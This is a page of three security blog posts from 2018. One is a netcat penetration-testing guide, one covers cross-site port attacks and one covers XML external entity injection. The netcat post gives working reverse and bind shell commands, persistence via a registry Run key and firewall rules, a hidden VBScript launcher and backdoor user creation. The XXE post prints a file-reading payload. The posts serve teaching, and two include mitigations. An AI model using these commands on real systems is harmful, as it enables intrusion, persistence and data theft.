Friday, 23 March 2018

NETCAT


NETCAtNetcat is a computer network utility used for taking access, sending access, sending and receiving files over the internet using TCP and UDP connection. This tool is very famous for debugging the network and for investigation purpose. Netcat is also known as NC or swiss army knife. It is the most critical threat to network admins, programmers and penetration testers.


NETCAT SETUP:

Setting up netcat in windows is very simple. You download Netcat for windows from the given link  https://joncraton.org/blog/46/netcat-for-windows/.
Once you downloaded it extract the file in c directory. Then just open the command prompt and navigate to the netcat directory (yes I know we are lazy, shortcut to open a command prompt from the same directory, just got to the netcat directory hold shift and right click, and you will see an option “open command windows here” ) now run nc.exe.
In Linux netcat is pre-installed. So we don’t need to worry about it. If you don’t find in Linux, open the terminal and type “apt-get install netcat”. This command will install netcat for you.
In this blog is using Kali Linux as my attacker machine and victim machine as windows 7.

PENETRATION TESTING WITH NETCAT

Netcat is used for two primary modes of operation, one is as a client, and the other is a server. These two operations are hackers favourite, and penetration testers also use these operations.
The primary usage of the two modes is connected to somewhere and listen for inbound
connect to somewhere: nc [-options] host-name port [s]  # this syntax is for netcat client mode
listen for inbound : nc -l -p port [options] [host-name] [port] # this syntax is for netcat server mode
the most commonly used options in netcat are
-c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]

-e filename                  program to exec after connect [dangerous!!]

-l                                  listen mode, for inbound connects

-n                                 numeric-only IP addresses, no DNS

-p port                       local port number

-u                                 UDP mode

-v                                 verbose [use twice to be more verbose]

-z                                 zero-I/O mode [used for scanning]
Netcat most potent options are -e prog. This option is used in server mode, which allows netcat to execute a command on the remote system. This option will enable netcat to run the specific program when clients connect to the server.
Nc -l -p 1234 -e cmd.exe        # windows

nc -l -p 1234 -e bin/sh             # Linux
These are the basics of netcat. If you are still a beginner in netcat read this article for clear understanding  http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf
let’s get into real-time penetration testing with netcat
let’s get a basic reverse shell from windows 7
nc -lvp 1234  # Kali Linux

nc.exe 192.168.0.151 1234 -e cmd.exe # windows (IP mentioned is Kali IP address)
when victim enters the command, ill get a reverse shell in Kali

 POST EXPLOITATION WITH NETCAT

post exploitation is the crucial phase of penetration testing and fun part too.So here is some fun part that we can perform using netcat.
Once we get a reverse shell from the victim system, we need to do some following steps
. That’s is maintaining the connection.
All the attackers face a big problem, which is session expiration. So here are some command s to make the session persistent.
@echo offxcopy"%systemdrive%\%username%\Desktop\nc.exe""C:\Windows\System32\" -­y         

             reg add "HKLM\soQware\microsoQ\windows\currentversion\run" /f /v"system" /t REG_SZ /d            "C:\windows\system32\nc.exe-­Ldp449 -­ecmd.exe”            

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow          protocol=UDP localport=449 

           netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow      

 program="C:\windows\system32\nc.exe "
 NOTE: this command should run as administrator

 RUNNING THE NETCAT IN BACKGROUND

Here is the vb script to run netcat in the background, so that you don’t have to wait for the user to restart their computer.
Dim objShellSet objShell = Wscript.CreateObject ("WScript.shell")objShell.run"C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

SetobjShell =  Nothing
play with firewall
netsh advfirewall set all profiles state off
Turn off windows firewall will notify the user
netsh advfirewall set allprofiles state           on       
– Turns firewall on
netsh advfirewall reset
– Reset the firewall back to  default
netsh advfirewall set all profiles firewallpolicy blockinbound,allowoutbound
– Block everything
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block           

 dir=IN
– Open Port
netsh advfirewall firewall delete rule name=" HTTP.”
– Delete Rule
schedule tasks
we can also be able to mess with windows schedule task; we can able to create, delete and run a task.
Creating Tasks
  – SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword     

  /SC HOURLY /TN rtest1 /TR notepad
Delete  Tasks
  – SCHTASKS /Delete /TN "Backup and Restore.”       
Running Tasks
SCHTASKS /Run /TN "StartBackup"
now let’s create and add a local user and granting with administrator right
net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" /

fullname:"brisk info sec"
Netcat is used for scanning ports on the network.
nc  -v  192.168.0.170   - z 1-1000   # ip = target ip

OUTPUT:

root@7h3pr0xy:~# nc -v  192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 554 (rtsp) open

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
sometimes we need to randomise the port as well against the target to alert the IDS (intrusion detection system) or IPS (intrusion prevention system).
nc -v -r 192.168.0.170 -z 1-1000

OUTPUT

root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
While performing penetration testing less information will not help us to move forward. So we look for more details. In netcat, we have a verbose which give more info about the target.
nc -vv -r 192.168.0.170 -z 130-140

OUTPUT:

root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused

(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused

(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused

 sent 0, rcvd 0
Netcat can be used for the offensive purpose as well as defensive. If you are right programming, you can automate the executing process
NOTE: use this swiss army knife in a useful way, so no one gets hurt with a sharp edge.
Play safe and be safe

AUTHOR

Venkatesh C.S
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Friday, 16 March 2018

Cross Site Port Attack (XSPA)

 

CROSS SITE PORT ATTACK (XSPA)

INTRODUCTION:

A web application is helpless against Cross Site Port Attack if it forms client provided URLs and does not disinfect the backend reaction got from remote servers previously sending it back to the client. The responses, in specific cases, can be concentrated to distinguish benefit accessibility (port status, flags and so forth.) and even bring information from remote administrations in unique ways.
Detecting a potential XSPA vulnerability is very simple and if the web app takes URL as input and tries to make it connect to the port and analyse the output and I have been attempting this XSPA attack on a testing app http://testphp.vulnweb.com/
Once I visited the testing site, and here I have selected the image categories option on the site as follows
Later I have selected the required image file it takes me to the URL as follow
Once I Visited this site I have started to capture the backend response using Burp Suite tool
Burp Suite is a graphical tool for testing Web application security, and It was mainly developed to provide a comprehensive solution for web application security checks. and In addition to this basic functionality, it also has some extra features such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer
I have cross checked this site using my localhost with some ports and captured the response in burp suite, and by this method, we can precisely analyse the response for each port
Here I have captured the response of the image URL and crossed check it with my localhost with port 80(HTTP), and I can see the response 200 OK (Normal response)
Once It fetches the average result, and you can also confirm this for other ports like 22(ssh), 21(ftp), 25(SMTP), 8080(https) etc. and you can check the result in browser as well.

During Port analysis, if any required port is closed, it fetches the result as
It also shows the response of 200, but it displays some warning like (failed to open) or connection refused etc. and if it shows this case of errors then you can confirm that the port is closed
In the above screenshot shows the different case of the port is opened but it shows the result without exposing the attacker IP on the server logs and it also reveals the backend service running on SSH

MITIGATION FOR XSPA ATTACK:

  • Unauthorized URL’s access should be restricted
  • Restrict Connectivity to the internal ports
  • Whitelist IP address
  • Disable Unwanted protocols and services.
  • You can block your ports using firewall for better security please check the link below to block your inernal ports
Reference Link:

CONCLUSION:

XSPA vulnerability attack mainly used to perform port scanning of a target using another vulnerable website and also an attacker can perform a DOS attack, Code Execution and other major attacks on other vulnerable  websites
Reference Link:

AUTHOR

RamKumar G
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

Tuesday, 13 March 2018

Detection and Exploitation XML Entity Injection(XXE)

DETECTION AND EXPLOITATION XML ENTITY INJECTION(XXE)

INTRODUCTION

XML External Entity Attack is a type of injection or input validation vulnerability which occurs in an application that allows any input parameter or data to be XML input or input which is combined into XML form data, and it is passed to an XML parser running with sufficient privileges to include external or system files.
Recently, there has been an increase in the use of XML documents due to the growing use of the web services such as REST API and SOAP, which commonly use XML to process the data.
XML has a feature to create entities dynamically; some of the objects are predefined, and they referenced by using an ampersand (&) and a semicolon (;) at the end. However, XML also allows us to create custom entities, the most popular being the internal and external entities. Internal entities can be used to reference internal data and external entities to reference data from external sources.

EXAMPLE FOR INTERNAL ENTITY:

<!DOCTYPE profile [<!ENTITY name "Brisk Infosec">]>
<Profile>
<name>&name;</name>
<class>Cyber Security</class>
<service>Pentest</service>
</profile>
In the first line, we have defined an entity “name” having a value “Brisk”; the block used to define the entities is known as the DTD block. Next, in the third line, you can see that we have referenced the entity “&name;”, which holds the value “Brisk.” In this way, we don’t have to input the name each time. All we have to do is use a reference to the entity.

EXAMPLE FOR EXTERNAL ENTITY:

<!DOCTYPE profile [<!ENTITY name SYSTEM "http://target.com/profile ">]>
<Profile>
<name>&name;</name>
<class>Data</class>
<service>pentest</service>
</profile>
In the first line, in the DTD block, we have defined an external entity, which contains a link to an external resource. When this XML document is processed, it would request an external source and would replace values of all instances of “&name;” with the content of the external resource. If the content of the external resource is processed and displayed back to the user without proper validation, an attacker may be able to abuse the parser in conducting an XXE injection attack.
To find any XXE (XML External Entity) vulnerability, attacker or tester needs to inject XML characters in all input fields and observe if XML parsing errors are generated.

EXPLOITATION OF XXE VULNERABILITY:

Use information disclosed in error messages to determine at what file path the XML parser is parsing. Cause errors to occur using malformed XML.
Let us consider a test website (here I’m using OWASP Mutillidae application)
1. In below image, the application has an XML parser input page,
2. Let’s try giving some XML inputs and check the response from the server.
3. After that, we can try to inject XML inputs with multiple user-defined entities
4. Now we can try to include external data using <!Entity> section of XML input. The <!ENTITY> section of an XML document optionally defines external files to be included as part of the XML document. Interestingly these can even be files from the system parsing the XML.
We can use the <!ENTITY> section of XML input, we can try to access local files like /etc/ passwd files of a Linux server.
5. Once we have given the above XML payload, we can get the password files details from back-end Linux server.
6. Similarly, we can try to load the boot.ini files if the server is windows operating system, using an XML payload like below
          <?xml version="1.0"?>

            <!DOCTYPE change-log [
                        <!ENTITY systemEntity SYSTEM "../../../../boot.ini">
            ]>
            <change-log>
                        <text>&systemEntity;</text>
            </change-log>

MITIGATIONS FOR XXE INJECTION ATTACKS:

1. XML parser functions like unmarshaller should have a secure configuration to prevent allowing external entities as part of an incoming XML document input.
2.XML inputs should not be processed directly as java.io.File, java.io.inputstream.
References:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://stackoverflow.com/questions/40649152/how-to-prevent-xxe-attack

Dawood Ansar
Security Engineer
BriskInfosec Technology and consulting PVT LTD
Find me @https://www.linkedin.com/in/dawood-ansar-29403213b/